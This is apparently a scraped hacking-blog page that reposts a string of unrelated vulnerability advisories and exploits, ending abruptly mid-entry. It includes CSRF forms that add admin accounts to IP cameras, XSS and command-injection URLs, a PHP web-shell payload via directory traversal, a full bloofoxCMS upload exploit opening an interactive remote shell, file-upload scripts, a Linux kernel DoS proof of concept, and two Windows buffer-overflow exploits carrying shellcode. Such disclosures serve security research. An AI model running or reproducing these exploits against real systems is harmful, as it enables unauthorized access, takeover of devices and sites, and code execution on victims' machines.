source: https://www.securityfocus.com/bid/60526/info
Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected.
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863181646
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Advisory ID: HTB23266
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication: July 1, 2015 [without technical details]
Vendor Notification: July 1, 2015
Vendor Patch: September 8, 2015
Public Disclosure: October 22, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors.
The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users’ cookies, spread malware to website visitors, and even obtain full control over vulnerable website.
A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor:
<form action = "http://[host]/admin/pages/maintenance" method = "POST">
<input type="hidden" name="form_name" value="maintenance">
<input type="hidden" name="maintenance_enable" value="on">
<input type="hidden" name="save" value="Save">
<input type="hidden" name="maintenance_text" value="<script>alert('ImmuniWeb');</script>">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Oxwall 1.8
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23266 - https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on Oxwall.
[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy to use PHP/MySQL social networking software platform.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Source: https://code.google.com/p/google-security-research/issues/detail?id=483
Windows: NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege
Platform: Windows 8.1 Update, Windows 10, Windows Server 2012
Class: Local Dos/Elevation of Privilege
Summary:
The NtCreateLowBoxToken API allows the capture of arbitrary handles which can lead to to local DoS or elevation of privilege.
Description:
The NtCreateLowBoxToken system call accepts an array of handles which are stored with the new token. This is presumably for maintaining references to the appcontainer specific object directories and symbolic links so that they do not need to be maintained anywhere else. The function, SepReferenceLowBoxObjects which captures the handles has a couple of issues which can lead to abuse:
1) It calls ZwDuplicateObject which means the API can capture kernel handles as well as user handles.
2) No checks are made on what object types the handles represent.
The fact that kernel handles can be captured isn’t as bad as it could be. As far as I can tell there’s no way of getting the handles back. The second issue though is slightly more serious as it allows a user to create a reference cycle to kernel objects and potentially maintain them indefinitely, at least until a reboot.
One way of doing this is to exploit the fact that threads can be assigned impersonation tokens. For example a new thread can be created and the handle to that thread captured inside the lowbox handle table. The resulting lowbox token can then be assigned as an impersonation token, the thread and token now maintain their references and the kernel objects survive the user logging out. As the thread references the process this also maintains the process object.
Now at the point of logging out the process will be terminated but because the token maintains the reference cycle the process object itself will not go away. This can lead to a few results:
1) A user could open handles to important resources and files and prevent the handles getting released. This could ultimately result in a local DoS (although only something like a terminal server would be affected) and the administrator wouldn’t easily be able to fix it without rebooting as the process becomes hidden from typical task managers and trying to terminate it won’t help.
2) If a user logs out then back in again they can reopen the process (by PID or using NtGetNextProcess) and get access to the original process token which is still marked as having the original session ID (something which would normally require TCB privilege to change). This might be exploitable to elevate privileges in some scenarios.
While the session object still exists in the kernel due to the reference cycle, it is dead so trying to create a process within that session will not work, however the user could release the reference cycle by clearing the thread’s impersonation token which will let session object be cleaned up and allow another user (again think terminal server) to login with that session ID. The user could then create a process in that session indirectly by impersonating the token and using something like the task scheduler.
It isn’t immediately clear if the user would be able to access the session’s desktop/window station due to its DACL, but at the least references to the sessions object directory could be maintained (such as DosDevices) which might allow the user to redirect named resources for the user to themselves and get the privileges of the other user. This would be particularly serious if the other user was an administrator.
Proof of Concept:
I’ve provided a PoC which will cause the reference cycle and display the process if it can open one. The archive password is ‘password’. Follow these steps:
1) Extract the PoC to a location on a local hard disk which is writable by a normal user
2) Execute the poc executable file
3) The user should be automatically logged out
4) Log back in as the user
5) Execute poc again, it should now print out information about the stuck process and the extracted process token.
Expected Result:
It shouldn’t be possible to generate a kernel object reference cycle
Observed Result:
The reference cycle is created and the user can reopen the process.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38580.zip
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Code Execution & CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
The file editor provides the possibility to edit .tpl files stored in the
templates directory.
But the file editor is vulnerable to directory traversal when saving files, and
it does not check the submitted filename against a whitelist of allowed files.
It also does not check the file extension. Because of this, it is possible to
gain code execution.
Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.
3. Proof of Concept
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html
source: https://www.securityfocus.com/bid/60529/info
Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
<input type="Select" name="ViewerModeDefault" value="00000fff">
<input type="Hidden" name="ViewerAuthen" value="off">
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
<input type="Hidden" name="User1" value="xxxx,c0000fff">
<input type="Hidden" name="User2" value="xxxx,c0000fff">
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
<input type="Hidden" name="User4" value="Og==,00000fff">
<input type="Hidden" name="User5" value="Og==,00000fff">
<input type="Hidden" name="User6" value="Og==,00000fff">
<input type="Hidden" name="User7" value="Og==,00000fff">
<input type="Hidden" name="User8" value="Og==,00000fff">
<input type="Hidden" name="User9" value="Og==,00000fff">
<input type="Hidden" name="Reload" value="referer">
<script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/60532/info
Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
source: https://www.securityfocus.com/bid/60569/info
The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks
http://www.example.com/%2ftest/
source: https://www.securityfocus.com/bid/60566/info
TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
source: https://www.securityfocus.com/bid/60533/info
The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [.
name => $name,
galleryselect => 1, # Gallery ID, should exist
Filedata => [ "$file", "file.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}
source: https://www.securityfocus.com/bid/60585/info
bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected.
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : Bloofox CMS Unrestricted File Upload Exploit
Date : 17 June 2013
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.bloofox.com/
Software Link : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
Version : 0.5.0
Tested on : Window and Linux
#####################################################
VULNERABILITY: Unrestricted File Upload
#####################################################
This application has an upload feature that allows an authenticated user
with Administrator roles or Editor roles to upload arbitrary files to media
directory cause remote code execution by simply request it.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
if ($argc < 3)
{
print "\n==============================================\n";
print " Bloofox CMS Unrestricted File Upload Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n\n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n\n";
print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "username={$argv[3]}&password={$argv[4]}&action=login";
$packet = "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
$response = http_send($host, $packet);
if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
print "\n..:: Login Successful ::..\n";
print "\n..:: Waiting hell ::..\n\n";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}media/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nBloofox-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
/*
source: https://www.securityfocus.com/bid/60586/info
The Linux Kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions.
*/
/*
** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
** Jonathan Salwan - 2013-06-05
*/
#include <errno.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
struct ext4_new_group_input {
__u32 group;
__u64 block_bitmap;
__u64 inode_bitmap;
__u64 inode_table;
__u32 blocks_count;
__u16 reserved_blocks;
__u16 unused;
};
#define EXT4_IOC_GROUP_ADD _IOW('f', 8, struct ext4_new_group_input)
int main(int ac, const char *av[]){
struct ext4_new_group_input input;
int fd;
if (ac < 2){
printf("Syntax : %s <ext4 device>\n", av[0]);
printf("Example : %s /tmp\n", av[0]);
return -1;
}
printf("[+] Opening the ext4 device\n");
if ((fd = open(av[1], O_RDONLY)) < 0){
perror("[-] open");
return -1;
}
printf("[+] Trigger the infinite loop\n");
input.group = -1;
if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){
perror("[-] ioctl");
}
close(fd);
return 0;
}
source: https://www.securityfocus.com/bid/60760/info
FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FtpLocate 2.02 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>
source: https://www.securityfocus.com/bid/60690/info
The RokDownloads component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<?php
$uploadfile="Amir.php.gif";
$ch =
curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/60660/info
et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.
An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application.
et-chat 3.07 is vulnerable; other versions may also be affected.
http://www.example.com/chat/?AdminRegUserEdit&admin&id=4
source: https://www.securityfocus.com/bid/60682/info
TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
http://drupal.org/node/207891
import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Device Name" in i:
print i.strip()
if "Node ID" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Manufacture:" in i:
print i.strip()
if "Model:" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Community" in i:
print i.strip()
source: https://www.securityfocus.com/bid/60782/info
Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks.
http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png
source: https://www.securityfocus.com/bid/60818/info
Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible.
Motion 3.2.12 is vulnerable; other versions may also be affected.
Buffer-overflow:
# motion -c `python -c 'print "\x41"*1000'`
[0] Configfile
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
not fou:
Segmentation fault
# motion -p /tmp/`python -c 'print "\x41"*5000'`
Segmentation fault
Cross-site scripting:
http://www.example.com
<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>
Cross-site request forgery:
http://www.example.com/0/config/set?control_authentication=admin:mypassword
(Set admin password)
http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary
SQL
query)
source: https://www.securityfocus.com/bid/60794/info
Oracle VM VirtualBox is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the host system's network to become unusable, resulting in denial-of-service condition.
VirtualBox 4.2.12 is affected; other versions may also be vulnerable.
tracepath 8.8.8.8
source: https://www.securityfocus.com/bid/60795/info
Xaraya is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Xaraya 2.4.0-b1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?func=modinfonew&id=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=modules&type=admin
http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=blocks&tab=config&type=admin
http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin
http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3
source: https://www.securityfocus.com/bid/60826/info
ZamFoo is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
ZamFoo 12.0 is vulnerable; other versions may also be affected.
http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`
# Exploit Title : Sam Spade 1.14 - Buffer OverFlow
# Date : 10/30/2015
# Exploit Author : MandawCoder
# Contact : MandawCoder@gmail.com
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Version : 1.14
# Tested on : XP Professional SP3 En x86
# Category : Local Exploit
# Description:
# bug is on this section == Tools -> Crawl website...
# Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section.
#
# this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it.
f = open("file.txt", "w")
Junk = "A"*503
addr = "\x53\x93\x42\x7E"
space = "AAAA"
nop="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e"
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23"
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d"
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5"
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07"
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c"
"\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13"
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3"
"\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74"
"\xcb\xe1\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0"
"\xa1\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63"
"\x94\x58\x33\xec\xe3\x64\x96\x49\x1b\x2f\xbb\xfb\xb4\xf6\x29"
"\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14"
"\xbb\xf3\xf0\xf1\xbb\xa0\xf1\xd3\xdf\x27\x62\xbf\x31\xc2\x02"
"\x5a\x4e")
f.write(Junk + addr + space + nop + shellcode)
f.close()
print "Done"
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt
Vendor:
================================
Spetnik.com
http://tcping.soft32.com/free-download/
Product:
=================================
Spetnik TCPing 2.1.0 / tcping.exe
circa 2007
TCPing "pings" a server on a specific port using TCP/IP by opening and
closing a
connection on the specified port. Results are returned in a similar fashion
to that
of Microsoft Windows Ping. This application is intended for use in testing
for open
ports on remote machines, or as an alternative to the standard "ping" in a
case
where ICMP packets are blocked or ignored.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
If TCPing is called with an specially crafted CL argument we will cause
exception and overwrite
the Pointers to next SEH record and SEH handler with our buffer and
malicious shellcode.
No suitable POP POP RET address is avail in TCPing as they start with null
bytes 0x00 and will
break our shellcode. However, TCPing is not compiled with SafeSEH which is
a linker option, so we
can grab an address from another module that performs POP POP RET
instructions to acheive
arbitrary code execution on victims system.
stack dump...
EAX 00000045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 000002CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AAAAAA....
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSANO_DATA (00002AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
WinDBG dump...
(17a8.149c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for
image00400000
eax=00000045 ebx=00000222 ecx=0040a750 edx=41414141 esi=0018fd21
edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010216
image00400000+0x270a:
0040270a 8802 mov byte ptr [edx],al
ds:002b:41414141=??
Exploit code(s):
===============
Python script...
'''
import struct,os,subprocess
#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx
#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
vulnpgm="C:\\tcping.exe "
nseh="\xEB\x06"+"\x90"*2 #JMP TO OUR SHELLCODE
seh=struct.pack('<L', 0x77214f99) #POP POP RET
payload="A"*580+nseh+seh+sc+"\x90"*20 #BOOOOOOOM!
subprocess.Popen([vulnpgm, payload], shell=False)
'''
Exploitation Technique:
